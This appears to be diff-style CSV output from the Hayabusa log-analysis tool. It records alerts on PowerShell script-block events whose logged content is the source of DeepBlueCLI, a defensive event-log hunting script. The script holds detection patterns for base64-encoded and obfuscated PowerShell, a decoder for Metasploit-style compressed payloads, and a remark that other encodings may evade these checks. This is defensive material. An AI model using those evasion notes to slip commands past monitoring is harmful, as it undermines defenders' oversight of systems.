"".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
